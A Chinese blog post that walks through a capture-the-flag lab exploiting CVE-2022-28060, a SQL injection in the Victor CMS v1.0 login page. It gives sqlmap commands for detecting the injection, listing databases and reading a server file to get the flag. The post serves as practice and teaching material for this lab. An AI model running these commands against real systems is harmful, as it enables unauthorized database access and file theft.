CVE-2022-28060

最新推荐文章于 2025-07-29 10:30:00 发布

原创最新推荐文章于 2025-07-29 10:30:00 发布 · 396 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#web

打开是这么个页面\

往下翻找到一个登录框

尝试输入万能密码登陆一下，进入includes/login.php，发现没有什么有用的东西

退回上一页，使用bp抓一下登录的包

导出文件，使用sqlmap跑一下

首先探测一下情况

Python sqlmap.py -r 1.txt(导出文件名) --batch

发现user_name字段存在sql注入

暴力破解数据库

Python sqlmap.py -r 1.txt(保存的文件名) --batch --dbs

爆出来5个库

在mysql库中查找flag文件

Python sqlmap.py -r 1.txt(保存的文件名) --batch -D “mysql(爆出的库名)” --file-read “/flag”

查看文件得到flag

Flag：flag{ea0f2f5a-4ddb-4a2a-880a-87b4b8b08977}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

diandian~

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Victor CMS SQL注入漏洞(CVE-2022-28060)

千寻的博客

11-28

1876

Victor CMS v1.0 /includes/login.php 存在sql注入

Victor CMS v1.0 SQL注入漏洞（CVE-2022-28060）

qq_45392044的博客

02-26

693

Victor CMS v1.0 /includes/login.php 存在sql注入。

参与评论您还未登录，请先登录后发表或查看评论

春秋云境系列靶场记录（合集）-不再更新

一只爱吃橙子的羊

11-29

9400

春秋云境系列靶场记录合集，不更新了哈……

【春秋云境】CVE-2022-28060

ZXW_NUDT的博客

02-22

2973

【春秋云境】CVE-2022-28060

精选资源

CVE-2022-33891POC Apache Spark 命令注入（CVE-2022-33891）POC

08-10

CVE-2022-33891POC Apache Spark 命令注入（CVE-2022-33891）POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本，参考官网链接： ...

麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9

03-15

麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包9 麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...

麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1

03-15

春秋云境 CVE-2022-4230 夺旗

05-02

### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件（版本13.2.9及以前）中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...

精选资源

sudo-1.9.12p1，解决cve-2022-43995

11-08

"sudo-1.9.12p1"是sudo的一个特定版本，该版本发布是为了修复一个重要的安全漏洞：CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制，以增强系统的安全性。它通过sudoers文件来...

春秋云境：CVE-2022-28060

一只爱吃橙子的羊

11-29

2726

Victor CMS v1.0 /includes/login.php 存在sql注入

CVE-2022-28060(Victor CMS v1.0 )

qq_45092459的博客

11-27

1455

存在问题本：Victor CMS v1.0 看到页面简单，然后旁边有一个登陆框，尝试登陆框哪里进行套路尝试(弱口令万能和注入)，见过注入有戏，吧他拿到sqlmp跑一下。然后找到flag。

春秋云镜——CVE-2022-28060

最新发布

qq_67521065的博客

07-29

349

摘要：本文介绍了如何利用Burpsuite和SQLmap进行渗透测试。首先通过Kali中的Firefox浏览器开启代理抓取数据包并保存，然后使用SQLmap读取文件进行爆破。最后通过特定命令查找flag值并提交结果。整个过程展示了从抓包到获取flag的完整渗透测试流程。

春秋云境CVE-2022-28060

m0_64432806的博客

03-20

318

春秋云境CVE-2022-28060 Victor CMS v1.0 /includes/login.php 存在sql注入

春秋云境：CVE-2022-28060（SQL注入）

m0_65712192的博客

04-20

959

Victor CMS v1.0 /includes/login.php 存在sql注入

CVE-2022-28060 i春秋云镜

biejianghua的博客

11-28

1138

i春秋云镜CVE-2022-28060

[春秋云镜] CVE-2022-28060 详细讲解

weixin_60374959的博客

11-28

3943

Victor CMS v1.0 /includes/login.php 存在sql注入。

CVE-2022-28060 Victor CMS v1.0 /includes/login.php 存在sql注入

qq_38733240的博客

06-03

482

Victor CMS v1.0 /includes/login.php 存在sql注入

[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag

qq_49199168的博客

10-30

2503

[春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag